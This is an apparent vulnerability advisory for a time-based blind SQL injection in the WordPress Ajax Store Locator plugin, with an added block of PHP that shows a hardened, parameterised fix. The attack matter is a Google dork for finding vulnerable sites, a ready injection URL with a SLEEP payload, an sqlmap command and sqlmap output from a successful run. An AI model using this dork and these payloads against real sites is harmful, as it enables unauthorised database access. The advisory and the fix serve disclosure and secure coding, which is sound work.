Gh0stTrac3

Wordpress Ajax Store Locator <= 1.2 SQL Injection

Apr 19th, 2015
######################

# Exploit Title : Wordpress Ajax Store Locator <= 1.2 SQL Injection Vulnerability

# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356

# Software Link : Premium (paid plugin, sold via the vendor homepage above)

# Google Dork : inurl:ajax-store-locator
# index of ajax-store-locator

# Date : 2015-03-29

# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox

######################

# Info:

The "sl_dal_searchlocation_cbf" AJAX callback (reached through wp-admin/admin-ajax.php with action=sl_dal_searchlocation) is affected by a SQL injection vulnerability.

The "StoreLocation" request parameter is not sanitized before it is used in a query.

# Exploit:

http://TARGET/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)

The injection is time-based blind: the request above should take about 10 seconds longer than the same request with StoreLocation=1~1. StoreLocation's value must contain the "~" delimiter, because the handler splits on it and only the second "~"-separated field ($qryVal[1]) reaches the query:

$storeLoc = $_REQUEST["StoreLocation"];   // raw request value, no sanitization
...
...
$qryVal = explode("~", $storeLoc);        // $qryVal[1] is the text after the first "~"
$sql_query = "SELECT a.*,b.*, 0 as ......... LEFT JOIN `$sl_tb_pluginset` as b ON (1=1) WHERE a.id=$qryVal[1]";   // $qryVal[1] concatenated unquoted into the WHERE clause
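The following is an added example, not the plugin's code and not part of the original advisory. It puts the vulnerable construction quoted above next to a hardened version that validates the delimiter, coerces the id to an integer and binds it through WordPress's $wpdb->prepare(). The store table name `wp_sl_store` (elided in the excerpt), the function names, and the handler wrapper are assumptions; $sl_tb_pluginset is taken from the excerpt.

```php
<?php
// Added example, not the plugin's own code. Contrasts the query construction
// quoted in the advisory with a hardened version. Assumptions: the store
// table is `wp_sl_store` (elided in the excerpt), $wpdb is the WordPress
// database object and $sl_tb_pluginset is the plugin-settings table name.

// Vulnerable: whatever follows the "~" is concatenated into the WHERE clause.
// StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)
// yields "... WHERE a.id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)".
function sl_search_store_vulnerable($storeLoc, $sl_tb_pluginset) {
    $qryVal = explode("~", $storeLoc);
    return "SELECT a.*, b.* FROM `wp_sl_store` AS a "
         . "LEFT JOIN `$sl_tb_pluginset` AS b ON (1=1) "
         . "WHERE a.id=$qryVal[1]";
}

// Hardened: check the delimiter, coerce the id to an integer and bind it with
// a %d placeholder, so the request value can never change the SQL structure.
function sl_search_store_fixed($storeLoc, $sl_tb_pluginset) {
    global $wpdb;

    $qryVal = explode("~", $storeLoc);
    if (count($qryVal) < 2) {
        return null;            // no "~": reject instead of reading an undefined $qryVal[1]
    }

    $id = absint($qryVal[1]);   // "1 AND SLEEP(10)" -> 1, "abc" -> 0
    if ($id === 0) {
        return null;            // ids start at 1; 0 means the field was not numeric
    }

    // Table names are fixed in code, not taken from the request; only the
    // integer id is bound.
    return $wpdb->prepare(
        "SELECT a.*, b.* FROM `wp_sl_store` AS a "
        . "LEFT JOIN `{$sl_tb_pluginset}` AS b ON (1=1) "
        . "WHERE a.id = %d",
        $id
    );
}

// Hypothetical wp_ajax_ handler showing how the hardened builder is used.
function sl_dal_searchlocation_handler_fixed() {
    global $wpdb, $sl_tb_pluginset;
    $storeLoc = isset($_REQUEST['StoreLocation']) ? (string) $_REQUEST['StoreLocation'] : '';
    $sql = sl_search_store_fixed($storeLoc, $sl_tb_pluginset);
    if ($sql === null) {
        wp_send_json_error('invalid StoreLocation');   // sends JSON and exits
    }
    wp_send_json($wpdb->get_results($sql));
}
```

With the hardened builder, the advisory's payload collapses to `WHERE a.id = 1` and the SLEEP() clause never reaches MySQL, so the timing difference that sqlmap keys on disappears. If the table name ever has to come from configuration rather than code, WordPress 6.2 and later accept an `%i` identifier placeholder in $wpdb->prepare(); on older versions keep it whitelisted in code as above.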

# PoC sqlmap:

sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1" -p StoreLocation --dbms mysql

[18:24:11] [INFO] GET parameter 'StoreLocation' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[18:24:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:24:18] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:24:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:24:29] [INFO] checking if the injection point on GET parameter 'StoreLocation' is a false positive
GET parameter 'StoreLocation' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: StoreLocation (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(5)))LCKZ)
---
[18:29:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0.12